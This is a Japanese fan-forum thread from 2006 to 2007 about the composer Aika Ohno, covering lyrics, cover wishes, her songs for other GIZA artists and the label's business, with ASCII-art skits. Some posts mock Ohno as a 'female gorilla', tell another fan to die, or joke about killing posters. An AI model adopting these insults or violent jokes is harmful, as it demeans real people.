   〈>´  ` くノハ,,ハ
    | i iノノ人)〉 ,,゚〜゚)  なあ愛果、今年のクリスマスはどこ行こうか?
    | トゝ-_-イl   、ヽ          今年はしめじの故郷へ連れてって♪
──(_つと_)─ と_)─────




158 :名無しの歌姫:2006/12/12(火) 13:32:32 ID:AKA2HOeq
愛しのアイカ

159 :名無しの歌姫:2006/12/13(水) 18:52:35 ID:DxRAHKFp
だれかfall apart againの歌詞わかる人いませんか?

160 :名無しの歌姫:2006/12/13(水) 21:31:59 ID:d9gQ4VsS
wandsの、‘明日もし君が壊れても’の歌詞を英訳したものだから
歌詞カードみるといいよ。

161 :名無しの歌姫:2006/12/14(木) 01:02:18 ID:4X6up5Bf
3rdアルバム出るとしたら何カバーしてほしい?

私は倉木のstate of mindに一票!

162 :名無しの歌姫:2006/12/14(木) 01:15:48 ID:rS7hq7Aa
>>161
ソウクルの「Lonesome Tonight」

163 :名無しの歌姫:2006/12/14(木) 01:57:06 ID:omFfMCEg
カバーだけじゃなくて、オリジナル曲も作って欲しい。どうしてもカバーだと
提供先のイメージが残るので、大野ワールドに浸れる曲が欲しい所。

164 :名無しの歌姫:2006/12/14(木) 20:51:13 ID:k+qsp1fs
次にカバー出すならZARD曲が中心じゃねえ?

165 :名無しの歌姫:2006/12/14(木) 21:17:20 ID:kdrWc5xY
>>160
歌詞カード持ってないんです
中古屋でCDのみで買ったんで

166 :名無しの歌姫:2006/12/14(木) 21:34:56 ID:k+qsp1fs
>>165
アップしてやりたいがここに書いたら著作権うんぬん言い出す奴いるんじゃねえか?

167 :名無しの歌姫:2006/12/14(木) 22:27:09 ID:ZIujx5zu
>>166
そうゆうときのためのりなろだだぜ。

168 :名無しの歌姫:2006/12/15(金) 19:14:38 ID:nuyNuPHU



   〈>´  ` くノハ,,ハ
    | i iノノ人)〉 ,,゚〜゚)  なあ愛果、今年のクリスマスはどこ行こうか?
    | トゝ-_-イl   、ヽ    ごめんなさい、今年のクリスマスも仕事なの…あなた暇すぎで羨ましいわw
──(_つと_)─ と_)─────



   〈>´  ` くノハ,,ハ
    | i iノノ人)〉 ;´゚〜゚)  俺は愛果と一緒に居たいから仕事キャンセルしたんだよ?
    | トゝ´_`イl   、ヽ    二人っきりのときは見栄を張らなくてもいいよ。仕事終わったらрキるから待っててね♪
──(_つと_)─ と_)─────


169 :名無しの歌姫:2006/12/17(日) 12:59:16 ID:Oyekmh9r
大野さんは来年も酷使されるのか。カワイソス。

170 :織田哲郎:2006/12/17(日) 14:56:23 ID:dKdRmmKp
          、,、;,,;、,,、,,,,、,、;、
         ,.; ;:::::::::::::::::::::::::::::::::::`:、
         i::: :::::::::::::::::::::::::::: ::::::;ヽ,
         i;::::r"""`'゛゛`""`ヾ::::::l'
         .!::::j ,,._, ニニ _.,,,.、i;::;,,"   / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
         ',,;::l '"""`;.._..;'"""` !:::;', <  
         .!:::.l ( ’ )  .( ’ ) !:::!'   |  俺の後継者だなんて10年早いわw
        !";:::::! ヾ=-", ヾ=="  !:ノヽ, | 
        ! .;:::::!.._,  (.. ('ヽ、、__!::! ) \__________
        ヽ!;;;:::::::/  i i i i).ヽ!::::::::}ノ
        _.!;::::::!  -===-こ、ヽ;::::},‐- 、
      /′ ;:::::::ヽ,________〈( c ):    ヽ
     /    ヽヽ:::::::::::::::::::ヽ,  .!;.    ヽ
    /       ヽヽ;:::::::::::::_,;ヽ-";:::ヽ、.   ヽ
            ヽ=ニ二二ニ=!:::::::::::::::ヽ


171 :名無しの歌姫:2006/12/17(日) 19:22:48 ID:j3dyI0mt
うつくしい

172 :名無しの歌姫:2006/12/19(火) 23:27:01 ID:H4rNzq7i
過労死だけはどうかしないで下さい。

173 :名無しの歌姫:2006/12/21(木) 23:30:19 ID:+/A68NuX
いつまで倉木ちゃんに寄生するんでしょうか・・。

174 :名無しの歌姫:2006/12/21(木) 23:43:01 ID:Bb6ycw+V
>>173
倉木(青野)が愛果に寄生してんだろうが!死ねよ倉ヲタ…

175 :名無しの歌姫:2006/12/22(金) 00:22:56 ID:HeTXRXm9
(青野)にする意味がわかんね

176 :名無しの歌姫:2006/12/22(金) 01:44:33 ID:mlbWMDBo
でも、大野曲が一番良く聞こえるのは倉木じゃね?

上木に提供した曲は雰囲気でぶち壊しにされたかんじ…。

177 :名無しの歌姫:2006/12/23(土) 02:42:36 ID:6VDgYYkx
珍しく荒れてますね。この系統の板では1番平和だったのに。
まあ、あくまで私見ですけどGIZAアーの殆どが大野さんに寄生(依存)
しているのは事実でしょう。三枝、竹井のごく一部は例外として。
1番相性がいいのは倉木でしょう。その次に愛内かな。歌唱力は別として。
上木の場合は完全にミスマッチでしょう。自分の中では大野さんはピンク、緑
上木のカラーは黒だと思っていますので。大野さんは自然癒し系、上木は女版
B'zと全くベクトルが違うので違和感があるのは当然でしょうね。



178 :名無しの歌姫:2006/12/23(土) 10:17:58 ID:DXwbC+z2
イナバ物置

179 :名無しの歌姫:2006/12/23(土) 11:43:28 ID:NHFNp2MY
大野さんのイメージカラは半透明の黄緑色
薄い葉に光が裏からさしこんでいる透明なでさわやかな春の青葉

180 :名無しの歌姫:2006/12/24(日) 13:19:05 ID:TYHS0+8P
だれかぁ
fall apart againの歌詞おねがいします

181 :名無しの歌姫:2006/12/24(日) 16:36:21 ID:aZoFOHKX
大野さんはどんなクリスマスを過ごすのかな?
こんな日もパソコンに向かう俺・・・

182 :名無しの歌姫:2006/12/24(日) 17:12:40 ID:u/hhbO4a
>>181
無難に岸和田の家族と、だと思う。

183 :名無しの歌姫:2006/12/24(日) 19:33:29 ID:wmeSCtI/
そうだね。大野さんは親孝行だからね。
本当にいい人だわ。悪口を言う人いないしね。

184 :名無しの歌姫:2006/12/24(日) 20:21:37 ID:Da70Pfi7
>>180
教えてあげたいんだけど、著作権とか恐いし…

185 :名無しの歌姫:2006/12/25(月) 00:58:04 ID:lL++70BG
TSUTAYAでCDかりたらいいだろう。

186 :名無しの歌姫:2006/12/25(月) 12:59:59 ID:ftCp6YJe
雌ゴリラだけど力は微妙

187 :名無しの歌姫:2006/12/25(月) 21:04:12 ID:9dF40I69
さっきコナンのEDでTAT流れてたけど、やっぱり大野曲
はいいね。倉木の歌と全然マッチしてないアニメ画と一緒に観てたけど
それでもTATは良かったね。大野さん早くTATのカバー出してくれないかな。

188 :名無しの歌姫:2006/12/25(月) 21:07:20 ID:WkX5l9y0
夏ごろパン工場ライブで竹井の日にゲストで来てたね。
音外してる曲もあったけど大体良かったよ。
まともなライブでもう一回見たい。

189 :名無しの歌姫:2006/12/26(火) 01:42:53 ID:8vZ3+dlS
岸和田か…
だんじり、清原、大野愛果…


何か違和感…

190 :名無しの歌姫:2006/12/26(火) 20:19:06 ID:D/t78UOa
愛果さんはタバコとかすったりするのかな?

191 :名無しの歌姫:2006/12/26(火) 22:40:08 ID:ROniCxzb
>>189
違和感ないよ。
清原はボスザルで、大野愛果は雌ゴリラだから。w

192 :名無しの歌姫:2006/12/27(水) 00:16:24 ID:pu8aJp4Z
アニメ画像といい感じだとおもうけど・・・

昨日テレビでやってたコナンの映画のエンディングもいいかんじ
じゃないかな?夏を待つセイルのようにとかもいいとおもうけど。

193 :名無しの歌姫:2006/12/27(水) 14:00:26 ID:J3ah/zDb
岸和田からなんば
愛果さんも南海のすし詰め通勤列車で痴漢におびえながら?それともサザン指定でゆったり?

194 :名無しの歌姫:2006/12/27(水) 21:17:18 ID:GCz9WJsY
>>193
(タカアンドトシ風に)メロディーメーカーが通勤列車?OLかっ!

(タカアンドトシ風に)サザン指定?VIPかっ?

195 :名無しの歌姫:2006/12/28(木) 14:29:26 ID:3Z33LpLd
車じゃない。この業界は勤務形態が不規則だし。

196 :名無しの歌姫:2006/12/28(木) 20:36:07 ID:CUgDqPb5
大野愛果に注目してるおまえらって何歳くらいなの?
俺なんてもうじき30なんですけど。おっさんですよ。心は21くらいなんすけどね。
倉木と同年代からスライドしていったやしで25くらい、10代はないだろうな・・

197 :名無しの歌姫:2006/12/28(木) 21:52:17 ID:d+MJLZ+1
大野さんはもっと表立ってやればいいのにとも思ったけど・・・
倉木のライブに出たとき「私は裏でやってるのがいい、表でやるのは緊張するし
精神衛生上よくない・・・」みたいな事いってたな。
裏方さんでやってる方が精神的には楽かな・・・

198 :名無しの歌姫:2006/12/28(木) 23:12:09 ID:ceVjMXph
35のオサーンもいますよ。自分の場合は倉木の初期3部作ではまりました。
倉木よりクレジット名の大野愛果の方がはるかにインパクトがあったので。

199 :名無しの歌姫:2006/12/29(金) 16:18:36 ID:npMJ+lc7
>>196
17の餓鬼なわけだが

200 :名無しの歌姫:2006/12/29(金) 21:23:17 ID:bxCb3EsB
200曲目!

201 :名無しの歌姫:2006/12/30(土) 02:04:54 ID:XkH1P0ax
倉木麻衣からスライドしてファンになった24歳女ですが。

202 :名無しの歌姫:2006/12/30(土) 03:48:07 ID:tR3yGQI5
とにかく大野さんはメロディが美しいの一言。数年前、ベビィフェイスという世界的な
メロディメーカーが来日してインタビューを受けていた記事があった。

彼曰く、かつて名曲と呼ばれる歌は全てメロディが美しい。曲の良し悪しは
メロディの美しさで決まる。例え優秀な歌手を使い、敏腕プロデゥサーを
付けたとしてもメロディが美しくなければ何にもならない。と言うような事
を言っていた。感銘したね。まさにおっしゃるとうりだな。と それ以来
歌手次第で購入していた私は作曲者をみてから買う様にしてますね。

203 :名無しの歌姫:2006/12/30(土) 03:54:59 ID:9N6j4yyx
http://p.pita.st/?r4xgcr3e

204 :名無しの歌姫:2006/12/30(土) 07:31:50 ID:PUdQ0P58
僕は小6の時にWANDSの(明日もし君が壊れても)を買って、この方の曲に衝撃をうけました。
ちなみに現在19歳です。

205 :名無しの歌姫:2006/12/30(土) 12:48:41 ID:PuGEMKY8



   〈>´  ` くノハ,,ハ
    | i iノノ人)〉 ,,゚〜゚)  なあ愛果、正月は俺の実家へ来ないか?家族に紹介したいんだ。
    | トゝ-_-イl   、ヽ        元日はゴリラ仲間で新年会あるから2日にして欲しいの。
──(_つと_)─ と_)─────





206 :名無しの歌姫:2006/12/30(土) 14:03:27 ID:GSiSAUyR


   〈>´  ` くノハ,,ハ
    | i iノノ人)〉 ,,゚〜゚)  なあ愛果、そう言えば俺も元日はきのこ仲間で新年会あるから顔合わせは2日でいいぞ。
    | トゝ-_-イl   、ヽ    きのこ食いたいwwゴリラって凶暴だから肉食動物と間違われるけど実は草食動物なんだよ。
──(_つと_)─ と_)─────





   〈>´  ` くノハ,,ハ
    | i iノノ人)〉 ,,゚〜゚)  なあ愛果、お前が竹井さんと仲良くしてるのは成長した竹を食べるためか?
    | トゝ-_-イl   、ヽ     ええ。しめじも美味しいけど、なんだかんだ言ってもゴリラの主食は竹だからねw    
──(_つと_)─ と_)─────





   〈>´  ` くノハ,,ハ
    | i iノノ人)〉 ,,゚〜゚)  なあ愛果、ところで来年ってお前三十路か?
    | トゝ-_-イl   、ヽ      ええ…そう言うあなたは来年でもうしめじ33になるのね。
──(_つと_)─ と_)─────






207 :名無しの歌姫:2006/12/30(土) 17:35:48 ID:Ia1gQY3s
>>196
俺は19歳です。
17のときからファンやってます。

208 :名無しの歌姫:2006/12/30(土) 21:28:11 ID:yCS7ickB
>>206
クソワロタwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww

209 :名無しの歌姫:2006/12/31(日) 08:47:48 ID:OnSXakdI
>>206
しめじって結構若いのねもっとオサーンかと思ってた

210 :名無しの歌姫:2006/12/31(日) 15:19:32 ID:o23RfWgq
年の瀬に地獄をお見舞い
http://kabo2006.ff-j.com/
貴様らこれでもくらえ




211 :名無しの歌姫:2006/12/31(日) 15:46:10 ID:LnaZQhLv
>>206
大野さんって本当に来年30歳になるの?まだ25歳くらいかと思ってたw

212 :名無しの歌姫:2006/12/31(日) 17:20:59 ID:kChoPszX
オマイラコラム見ろ!
この人絵うまいどころかうますぎだぞw

213 :名無しの歌姫:2007/01/01(月) 03:08:53 ID:G+rdo95T
みなさんあけましておめでとうございます。

214 : 【大吉】 【621円】 :2007/01/01(月) 10:58:39 ID:3iOlClhK
あけおめ

215 :名無しの歌姫:2007/01/01(月) 15:05:27 ID:rZyUyUIn
またも倉木麻衣へ楽曲提供です。

2月14日『Season of love 』 
作詞 倉木麻衣 作曲 大野愛果 編曲 Cybersound

今日、横浜でやってた倉木麻衣のカウントダウンライブのエンディングで
流れてたけど、いい曲だったよ。(・∀・)

216 :名無しの歌姫:2007/01/01(月) 17:47:45 ID:3ezSySfh
ゴリラって林檎食べるんだっけ。

217 :名無しの歌姫:2007/01/01(月) 21:10:24 ID:toq6ubHp
大野さんはチョコが好きです

218 :名無しの歌姫:2007/01/02(火) 17:54:15 ID:X7RhgilB
>>196
私は14から。今17の工房。
倉木のLove,dayとかsecret of で興味もった。
倉木に囁くような時の声が似てるが、遥かに大野愛果の方が歌上手いよな。
おっと、長レススマソ


219 :名無しの歌姫:2007/01/03(水) 20:20:37 ID:yBLeZhZ8
大野の一番の神曲は最初の明日もし君が壊れても
だと思う
WANDS、ZARD、愛果verでアレンジ違ってもよさはかわらない

220 :名無しの歌姫:2007/01/03(水) 23:42:18 ID:ykFHsTGH
14くらいの厨房でも大野愛果に気付くんもんなんだねえ。
俺なんて倉木デビュー当時から大野の曲調がむちゃくちゃ良いなぁと思っていても
作曲家として活動してる大野が後にCD出すなんて思わなかったし
どっちかっつうとCybersoundのアレンジすげえ誰これ?ってほうが強かった。

そもそも当時は大野本人がどういう人なのか知る手段すらあんまりなかったし
ちょうどこの頃からネットやり始めたからって、ずっと大野を見てたわけでもなく、
それからず〜っと時間が過ぎて久々に倉木を聞いて大野を思い出して2ちゃん見て
CD出してた事を知って現物調達してきて、何年越しでようやく本人に触れたわけで、
当時から知ってた割にやたら遠回りになった身からすればお前らの嗅覚はすげえよ。
宇多田ヒカルとかデビュー前から曲情報つかんでた俺が言うんだ間違いない。
倉木を知ったのは初聴きで「?」と思ったからというのは公然の秘密だけどさ。

221 :名無しの歌姫:2007/01/04(木) 00:06:41 ID:HQG7eD0p
次は死ねじチャンス!

222 :名無しの歌姫:2007/01/04(木) 00:07:29 ID:HQG7eD0p
死ねじ222

223 :名無しの歌姫:2007/01/04(木) 00:21:16 ID:TZCMqwMw


   〈>´  ` くノハ,,ハ
    | i iノノ人)〉 ,,゚〜゚)  なあ愛果、>>221-222が禿しくうざいんだが・・・・殺していいか?
    | トゝ-_-イl   、ヽ    うざすぎよね。あなたが手を汚さなくてもいいわよ。私が怪力で叩き潰してぶっ殺してやるわ。
──(_つと_)─ と_)─────




224 :名無しの歌姫:2007/01/04(木) 02:37:59 ID:fkOtzdIk
大野の初期は明日もし、少女の頃、遠い〜未来へとかの
バンドサウンドのバラードって印象が強かったから
倉木のLove,DayやStay〜とかはすごく違和感があった

225 :名無しの歌姫:2007/01/04(木) 21:51:16 ID:UYjazdz7
Love,Dayってやっぱ神だよな

226 :名無しの歌姫:2007/01/04(木) 21:55:00 ID:KOcfW1M9
一番最強なのは愛内のclose to your heart

227 :名無しの歌姫:2007/01/05(金) 13:41:03 ID:bOjzY7iE
愛内なら恋はスリル〜じゃね?

228 :名無しの歌姫:2007/01/06(土) 02:47:37 ID:Xhj0QS4B
ミラクル好きだけどダメ?

229 :名無しの歌姫:2007/01/06(土) 11:43:46 ID:I0XP1mXG
>>224
それだけ幅広くいろんなジャンルのメロディーが創れるって事でしょ。
やっぱり天才なんだよ。かなり昔の話になるけど、中西圭三の1stと2nd
でかなり違うメロディーを書いてたのを当時の松宮和彦(故人。名前の漢字
はあやふや。)がえらく賞賛していた。それと一緒。やっぱり大野さんは凄い。

230 :名無しの歌姫:2007/01/06(土) 16:07:36 ID:MeUp7i9X
大野さんは本当に凄い方です。


231 :名無しの歌姫:2007/01/07(日) 00:16:10 ID:RRWtgy/f
大野

232 :名無しの歌姫:2007/01/07(日) 00:51:16 ID:FiTvL02O
最近、レベルが下がってきていると思う。
2月の倉木の新曲が終わったら、少し休養するべき。
少し位会社に意見してもいいのではないか。
本人がやるというのであれば話は別だが。自分は部外者なので。

233 :名無しの歌姫:2007/01/07(日) 02:05:03 ID:ke4D1GhC
次は死ねじチャンス!

234 :名無しの歌姫:2007/01/07(日) 02:05:37 ID:ke4D1GhC
死ねじ234

235 :名無しの歌姫:2007/01/07(日) 02:30:06 ID:kHdsm+M+
>>232
作曲休養するならカバーアルバムリリースして欲しい

236 :名無しの歌姫:2007/01/07(日) 10:57:34 ID:S72zrRw4
>>235
4年位出してないから、うまくいかないかもしれないけど
是非やってほしいですね。ボイトレもしてそうなので心配なさそう。

237 :名無しの歌姫:2007/01/07(日) 18:01:24 ID:dWNjA7zf
たまにパンライブとかでてるから問題ないでしょ。

238 :名無しの歌姫:2007/01/07(日) 22:56:03 ID:GegsWh3Y
明日もし君が壊れてもって何かのCMで使われていたような気がするんですが
なんのCMで使われていた曲か覚えている人いますか?

239 :名無しの歌姫:2007/01/08(月) 00:23:31 ID:6geSdFjb
Love,day〜みたいな流麗なメロディのPOPSがまた聴きたい。

240 :名無しの歌姫:2007/01/08(月) 09:39:55 ID:2AYlYmaK
>>238
遊戯王のEDテーマじゃなくて?

241 :名無しの歌姫:2007/01/08(月) 15:59:08 ID:FuMz+KLF
>>239
あれはPOPとR&Bの融合って感じだよね。
倉木が大ブレイクしたのはゴリゴリのR&B路線でいかなかったのも大きいと思う。

242 :名無しの歌姫:2007/01/08(月) 22:13:44 ID:Xrk2xjzG
売り方が上手かっただけ

243 :名無しの歌姫:2007/01/09(火) 01:08:19 ID:LUBOO+gj
Love,day〜はいま聴いても正直言っていいなあって思う。
倉木Verをほかのアーティストにカバーしてみてほしい。
大野Verだとあのレベルで歌える日本人は宇多田くらいか・・・ありえんなw

244 :名無しの歌姫:2007/01/09(火) 03:43:32 ID:LetCds3P
大野愛果はしっかりデビューさせとくべきだったね
歌唱力あるしシンガーソングライターとしてやっていけたはずだ
ほんとGIZAは売り方が下手だな

245 :名無しの歌姫:2007/01/09(火) 14:02:38 ID:ppeAR0J8
>>242
むしろ下手

246 :名無しの歌姫:2007/01/09(火) 18:10:29 ID:MfVAcXoM
作曲出来ない奴ばっかりデビューさせるから悪いんだよ。
毎年、同じスキルのばかりで、似たり奇ったり。デビューの基準をもっと
きびしくすればいいんだ。愛内みたいに作曲できなくても歌唱力が優秀なら
特例でOKとか、作曲できるけど、歌が多少下手でも、そこはメロディーの力
でカバーできる位の人材ならOKとか。(例えば布袋とかみたいなの)後者の方
増えるのがいいんだけど。とにかく一定のレベルに達していないのに出すのは
恥を晒しているようなもの。それが出来ないんだったら、こんな会社潰れても
いいんじゃない。本当の実力者は移籍する事が出来るし。会社より大野さんが
先に潰れるが1番悲しい。大野さんと愛内だけは絶対潰れて欲しくない。

247 :名無しの歌姫:2007/01/09(火) 20:11:57 ID:ppeAR0J8
移籍も現実厳しい

248 :名無しの歌姫:2007/01/10(水) 13:23:40 ID:KEN4ynG9
やってみないとわからないんじゃない。
今の状況のままじゃ、このまま消えるのは目に見えてるし。

249 :名無しの歌姫:2007/01/10(水) 17:42:48 ID:+4NnSx6D
じゃなくて移籍できないでしょたぶん。
大野さんに限らずGIZA色が強い歌手はたぶん無理

250 :名無しの歌姫:2007/01/11(木) 16:50:40 ID:a62D/YTi
長戸がバーニングににらまれているからね。
バーニンググループは大手の中でもかなり影響力があるから。
香具師の犯した失態でこうなった訳で、長戸を追い出さない限り無理だろうね。

48 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)